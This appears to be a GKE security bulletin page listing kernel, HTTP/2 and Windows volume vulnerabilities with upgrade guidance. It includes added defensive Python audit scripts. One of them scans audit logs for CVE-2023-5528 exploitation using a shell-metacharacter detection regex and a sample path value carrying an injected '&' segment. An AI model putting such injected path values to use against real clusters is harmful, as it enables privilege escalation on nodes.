The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-024
Published: 2024-04-25
Updated: 2024-07-18
Reference:
CVE-2024-26585
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-26585.
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-022
Published: 2024-04-03
Updated: 2024-07-17
Reference: CVE-2023-45288
2024-07-17 Update: Added patch versions for GKE on VMware.
2024-07-09 Update: Added patch versions for GKE on Bare Metal.
2024-04-24 Update: Added patch versions for GKE.
GKE
Updated: 2024-04-24
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. GKE clusters with authorized networks configured are protected by limiting network access, but all other clusters are affected. GKE Autopilot and Standard clusters are affected.
What should I do?
2024-04-24 Update: Added patch versions for GKE. The following versions of GKE include the Golang security patches to fix this vulnerability. Upgrade your GKE clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support.
Mitigate by configuring authorized networks for control plane access:
You can protect your clusters against this class of attacks by configuring authorized networks. Follow the instructions to enable authorized networks for an existing cluster. To learn more about how authorized networks control access to the control plane, see How authorized networks work. To see the default authorized network access, view the table in the Access to control plane endpoints section. Authorized networks limit which addresses can reach the control plane endpoint; they do not change the HTTP/2 handling itself, so a caller inside an allowed range can still trigger the DoS until the cluster is upgraded.
What vulnerabilities are addressed by this patch?
The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on the Kubernetes control plane. |
High |
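As an added example of the authorized-networks mitigation (this is not Google's code or tooling), the script below reads the JSON printed by gcloud container clusters list --format=json and reports which clusters still expose their control-plane endpoint to any address. It reads the masterAuthorizedNetworksConfig and privateClusterConfig fields, which it assumes are present in that output; the cluster records in SAMPLE_CLUSTERS_JSON are constructed sample data, not real clusters.

```python
"""Find GKE clusters whose control plane is reachable without authorized networks.

Added example for the authorized-networks mitigation in GCP-2024-022; not
Google's code. It consumes the JSON printed by
`gcloud container clusters list --format=json`. The fields it reads
(masterAuthorizedNetworksConfig, privateClusterConfig) are the classic GKE
API fields and are assumed to be present in that output; the cluster records
below are constructed sample data, not real clusters.
"""
import ipaddress
import json

ANY_V4 = ipaddress.ip_network("0.0.0.0/0")
ANY_V6 = ipaddress.ip_network("::/0")


def classify_cluster(cluster):
    """Return (status, detail): 'open', 'restricted' or 'private-endpoint'."""
    if cluster.get("privateClusterConfig", {}).get("enablePrivateEndpoint"):
        return "private-endpoint", "public endpoint disabled"
    man = cluster.get("masterAuthorizedNetworksConfig", {})
    if not man.get("enabled"):
        return "open", "authorized networks disabled; endpoint reachable from any address"
    blocks = man.get("cidrBlocks", [])
    broad = []
    for block in blocks:
        net = ipaddress.ip_network(block["cidrBlock"], strict=False)
        # A default route or anything shorter than /8 is an allow-list in name only.
        if net in (ANY_V4, ANY_V6) or net.prefixlen < 8:
            broad.append(block["cidrBlock"])
    if broad:
        return "open", "allow-list contains " + ", ".join(broad)
    detail = f"{len(blocks)} CIDR block(s)"
    # Assumed default: when the field is absent, Google Cloud public IPs stay allowed.
    if man.get("gcpPublicCidrsAccessEnabled", True):
        detail += "; Google Cloud public IPs still allowed (gcpPublicCidrsAccessEnabled)"
    return "restricted", detail


def audit(clusters_json):
    """Map cluster name -> (status, detail) for a gcloud JSON listing."""
    return {c["name"]: classify_cluster(c) for c in json.loads(clusters_json)}


def open_clusters(clusters_json):
    """Names of clusters that still need authorized networks (or the patch)."""
    return sorted(n for n, (status, _) in audit(clusters_json).items() if status == "open")


# Constructed sample in the shape of `gcloud container clusters list --format=json`.
SAMPLE_CLUSTERS_JSON = json.dumps([
    {"name": "dev-open",
     "masterAuthorizedNetworksConfig": {}},
    {"name": "staging-anyone",
     "masterAuthorizedNetworksConfig": {
         "enabled": True,
         "cidrBlocks": [{"displayName": "everyone", "cidrBlock": "0.0.0.0/0"}]}},
    {"name": "prod-office",
     "masterAuthorizedNetworksConfig": {
         "enabled": True, "gcpPublicCidrsAccessEnabled": False,
         "cidrBlocks": [{"displayName": "office", "cidrBlock": "203.0.113.0/24"}]}},
    {"name": "prod-private",
     "privateClusterConfig": {"enablePrivateNodes": True, "enablePrivateEndpoint": True},
     "masterAuthorizedNetworksConfig": {"enabled": True, "cidrBlocks": []}},
])

if __name__ == "__main__":
    for name, (status, detail) in audit(SAMPLE_CLUSTERS_JSON).items():
        print(f"{name:15s} {status:17s} {detail}")
```

To run it against real output, pass the string from gcloud to audit() instead of SAMPLE_CLUSTERS_JSON. A cluster reported as "restricted" can still be reachable from Google Cloud public IP addresses when gcpPublicCidrsAccessEnabled is left at its default, which is the default access the bulletin's "Access to control plane endpoints" table describes; a "private-endpoint" cluster has no public endpoint at all, but its VPC-reachable endpoint is still unpatched until the upgrade.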
GKE on VMware
Updated: 2024-07-17
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane.
What should I do?
2024-07-17 Update: Added patch versions for GKE on VMware. The following versions of GKE on VMware include code to fix this vulnerability. Upgrade your GKE on VMware clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on VMware versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support.
What vulnerabilities are addressed by this patch?
The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on the Kubernetes control plane. |
High |
GKE on AWS
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane.
What should I do?
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on AWS versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support.
What vulnerabilities are addressed by this patch?
The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on the Kubernetes control plane. |
High |
GKE on Azure
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane.
What should I do?
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on Azure versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support.
What vulnerabilities are addressed by this patch?
The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on the Kubernetes control plane. |
High |
GKE on Bare Metal
Updated: 2024-07-09
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability (CVE-2023-45288) was recently discovered in multiple implementations of the HTTP/2 protocol, including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane.
What should I do?
2024-07-09 Update: Added patch versions for GKE on Bare Metal. The following versions of GKE on Bare Metal include code to fix this vulnerability. Upgrade your GKE on Bare Metal clusters to the following versions or later:
The golang project released patches on April 3, 2024. We'll update this bulletin when GKE on Bare Metal versions that incorporate these patches are available. To request a patch on an accelerated timeline, contact support.
What vulnerabilities are addressed by this patch?
The vulnerability (CVE-2023-45288) allows an attacker to execute a DoS attack on the Kubernetes control plane. |
High |
GCP-2024-018
Published: 2024-03-12
Updated: 2024-05-06
Reference:
CVE-2024-1085
2024-05-06 Update: Added patch versions for GKE Ubuntu node pools and removed an extra horizontal line element from the 2024-04-04 update.
2024-04-04 Update: Corrected minimum versions for GKE Container-Optimized OS node pools.
GKE
Updated: 2024-05-06
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-1085.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-05-06 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
2024-04-04 Update: Corrected minimum versions for GKE Container-Optimized OS node pools. The minimum GKE versions containing the Container-Optimized OS fixes listed previously were incorrect. The following versions of GKE are updated with code to fix this vulnerability on Container-Optimized OS. Upgrade your Container-Optimized OS node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-017
Published: 2024-03-06
Reference:
CVE-2023-3611
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2023-3611.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-014
Published: 2024-02-26
Reference:
CVE-2023-3776
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2023-3776.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-013
Published: 2024-02-23
Reference:
CVE-2023-3610
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2023-3610.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-012
Published: 2024-02-20
Reference:
CVE-2024-0193
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-0193.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-011
Published: 2024-02-15
Reference:
CVE-2023-6932
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2023-6932.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-010
Published: 2024-02-14
Updated: 2024-04-17
Reference:
CVE-2023-6931
2024-04-17 Update: Added patch versions for GKE on VMware.
GKE
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2023-6931.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
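The upgrade guidance in the Linux kernel bulletins above (GCP-2024-029 through GCP-2024-010) is the same each time: find the node pools on an affected minor version, move them to the listed patch version or later for their OS image, and leave GKE Sandbox pools alone because they are not impacted. The Python script below, added here as an example and not Google's tooling, performs that comparison over the JSON that kubectl get nodes -o json prints. MINIMUMS holds placeholder version strings that you replace with the versions named in the bulletin you are acting on; the node labels cloud.google.com/gke-os-distribution and sandbox.gke.io/runtime are the ones GKE sets on nodes; SAMPLE_NODES is constructed input, not real cluster output.

```python
"""Audit GKE nodes against a bulletin's minimum patched versions.

Added example for the "upgrade your node pools to one of the following
patch versions or later" guidance in the Linux kernel bulletins above.
Not Google's code. MINIMUMS holds placeholder versions: replace them with
the patch versions listed in the bulletin you are acting on. SAMPLE_NODES
is constructed input in the shape of `kubectl get nodes -o json`.
"""
import re

GKE_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)-gke\.(\d+)$")
OS_LABEL = "cloud.google.com/gke-os-distribution"   # "cos" or "ubuntu" on Linux nodes
SANDBOX_LABEL = "sandbox.gke.io/runtime"             # "gvisor" on GKE Sandbox node pools

# PLACEHOLDER minimums, keyed by OS image and then by minor line.
MINIMUMS = {
    "cos": {"1.28": "1.28.9-gke.1069000", "1.29": "1.29.4-gke.1043002"},
    "ubuntu": {"1.28": "1.28.10-gke.1075001", "1.29": "1.29.5-gke.1091002"},
}


def parse_gke_version(version):
    """Return (major, minor, patch, gke_build) or None for a non-GKE string."""
    m = GKE_VERSION_RE.match(version.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def is_patched(running, minimums):
    """True/False when the node's minor line is in `minimums`, else None.

    The tuple comparison orders by patch first and -gke build second, so a
    later build of the same patch (gke.1209000 vs gke.1069000) counts as fixed.
    """
    parsed = parse_gke_version(running)
    if parsed is None:
        raise ValueError(f"not a GKE version string: {running!r}")
    line = f"{parsed[0]}.{parsed[1]}"
    if line not in minimums:
        return None  # unlisted minor line: surface it, never assume it is safe
    return parsed >= parse_gke_version(minimums[line])


def check_nodes(nodes, minimums):
    """Bucket every node as patched, unpatched, unknown or sandboxed."""
    report = {"patched": [], "unpatched": [], "unknown": [], "sandboxed": []}
    for item in nodes["items"]:
        name = item["metadata"]["name"]
        labels = item["metadata"].get("labels", {})
        if labels.get(SANDBOX_LABEL) == "gvisor":
            report["sandboxed"].append(name)  # GKE Sandbox pools are not impacted
            continue
        os_image = labels.get(OS_LABEL, "")
        version = item["status"]["nodeInfo"]["kubeletVersion"]
        verdict = is_patched(version, minimums.get(os_image, {}))
        bucket = {True: "patched", False: "unpatched", None: "unknown"}[verdict]
        report[bucket].append(name)
    return report


def _node(name, os_image, version, extra_labels=None):
    labels = {OS_LABEL: os_image, **(extra_labels or {})}
    return {"metadata": {"name": name, "labels": labels},
            "status": {"nodeInfo": {"kubeletVersion": version}}}


# Constructed sample, not real cluster output.
SAMPLE_NODES = {"items": [
    _node("gke-prod-cos-a-1", "cos", "v1.29.3-gke.1282000"),        # below the 1.29 minimum
    _node("gke-prod-cos-a-2", "cos", "v1.28.9-gke.1209000"),        # later build of 1.28.9
    _node("gke-prod-ubuntu-b-1", "ubuntu", "v1.29.5-gke.1091002"),  # exactly the minimum
    _node("gke-prod-cos-c-1", "cos", "v1.30.1-gke.1329000"),        # minor line not listed
    _node("gke-prod-gvisor-d-1", "cos", "v1.27.11-gke.1062004",
          {SANDBOX_LABEL: "gvisor"}),                                 # GKE Sandbox pool
]}

if __name__ == "__main__":
    for bucket, names in check_nodes(SAMPLE_NODES, MINIMUMS).items():
        print(f"{bucket:10s} {', '.join(names) or '-'}")
```

The "unknown" bucket is deliberate: a minor line the bulletin does not list is reported rather than treated as safe, since it may be a newer line that already carries the fix or an older one that is out of support. The comparison is exactly the one the bulletins ask for ("this patch version or later"), which is why a later -gke build of the listed patch passes; when you pull a patch version from a newer release channel as the bulletins suggest, rerun the script so the node pool is re-checked against the same table.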
GKE on VMware
Updated: 2024-04-17
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
2024-04-17 Update: Added patch versions for GKE on VMware. The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-008
Published: 2024-02-12
Reference: CVE-2023-5528
GKE
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE Standard clusters running Windows Server nodes and using an in-tree storage plugin might be affected. GKE Autopilot clusters and GKE node pools using GKE Sandbox are not affected because they do not support Windows Server nodes.
What should I do?
1. Determine whether you have Windows Server nodes in use on your clusters: kubectl get nodes -l kubernetes.io/os=windows
2. Check audit logs for evidence of exploitation. Review Kubernetes audit logs to determine whether this vulnerability is being exploited. PersistentVolume create events whose local path field contains special characters are a strong indication of exploitation.
3. Update your GKE cluster and node pools to a patched version. The following versions of GKE have been updated to fix this vulnerability. Even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Windows Server node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel.
What vulnerabilities are addressed by this patch?
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. |
High |
GKE on VMware
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on VMware clusters running Windows Server nodes and using an in-tree storage plugin might be affected.
What should I do?
Determine if you have Windows Server nodes in use on your clusters:
kubectl get nodes -l kubernetes.io/os=windows
Check audit logs for evidence of exploitation. Kubernetes audit logs can be audited to determine if this vulnerability is being exploited. Persistent Volume create events with local path fields containing special characters are a strong indication of exploitation.
Update your GKE on VMware cluster and node pools to a patched version. The following versions of GKE on VMware have been updated to fix this vulnerability. Even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Windows Server node pools to one of the following GKE on VMware versions or later:
What vulnerabilities are addressed by this patch?
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. |
High |
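The audit-log check recommended for CVE-2023-5528 in the GKE and GKE on VMware entries above, as an added example that is not part of this bulletin or of any Google tooling: it scans kube-apiserver audit events for PersistentVolume create requests whose spec.local.path contains characters a real volume path never needs. The sample events and the character set are constructed for this example; on GKE the same events reach Cloud Logging wrapped in a different envelope, so adapt the field access before running it against exported logs.

```python
"""Flag PersistentVolume create events whose local path carries unexpected characters."""
import json
import re
from typing import Dict, Iterable, List, Optional

# Characters a legitimate local volume path should never contain. Backslashes and
# colons are deliberately allowed so that ordinary Windows paths do not trigger.
SUSPICIOUS_CHARS = re.compile(r"[&|;$`<>\"'(){}\r\n]")


def local_path_of(event: dict) -> Optional[str]:
    """Return requestObject.spec.local.path from an audit event, if present."""
    spec = (event.get("requestObject") or {}).get("spec") or {}
    path = (spec.get("local") or {}).get("path")
    return path if isinstance(path, str) else None


def is_suspicious_pv_create(event: dict) -> bool:
    """True for a PersistentVolume create whose local path has suspicious characters."""
    if event.get("verb") != "create":
        return False
    if (event.get("objectRef") or {}).get("resource") != "persistentvolumes":
        return False
    path = local_path_of(event)
    return path is not None and SUSPICIOUS_CHARS.search(path) is not None


def scan_audit_lines(lines: Iterable[str]) -> List[Dict[str, Optional[str]]]:
    """Parse JSON-lines audit output and summarise each suspicious event."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip non-JSON lines mixed into the log
        if is_suspicious_pv_create(event):
            findings.append({
                "auditID": event.get("auditID"),
                "user": (event.get("user") or {}).get("username"),
                "pv": (event.get("objectRef") or {}).get("name"),
                "path": local_path_of(event),
            })
    return findings


# Constructed sample events in the kube-apiserver audit event shape (not real log data).
SAMPLE_AUDIT_LINES = [
    json.dumps({"auditID": "evt-1", "verb": "create",
                "user": {"username": "system:serviceaccount:storage:provisioner"},
                "objectRef": {"resource": "persistentvolumes", "name": "win-data-pv"},
                "requestObject": {"spec": {"local": {"path": "C:\\data\\pv0"}}}}),
    json.dumps({"auditID": "evt-2", "verb": "create",
                "user": {"username": "dev@example.com"},
                "objectRef": {"resource": "persistentvolumes", "name": "odd-pv"},
                "requestObject": {"spec": {"local": {"path": "C:\\data\\pv0&junk"}}}}),
    json.dumps({"auditID": "evt-3", "verb": "update",
                "objectRef": {"resource": "persistentvolumes", "name": "odd-pv"},
                "requestObject": {"spec": {"local": {"path": "C:\\data\\pv0&junk"}}}}),
    "not-json: kubelet restarted",
]

if __name__ == "__main__":
    for finding in scan_audit_lines(SAMPLE_AUDIT_LINES):
        print(finding)
```

Only the create verb is matched because that is the event the bulletin names; an update to an existing volume with the same path is worth a second look but is not the indicator described here.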
GKE on AWS
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on AWS clusters aren't affected.
What should I do?
No action required. |
None |
GKE on Azure
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on Azure clusters aren't affected.
What should I do?
No action required. |
None |
GKE on Bare Metal
Description | Severity |
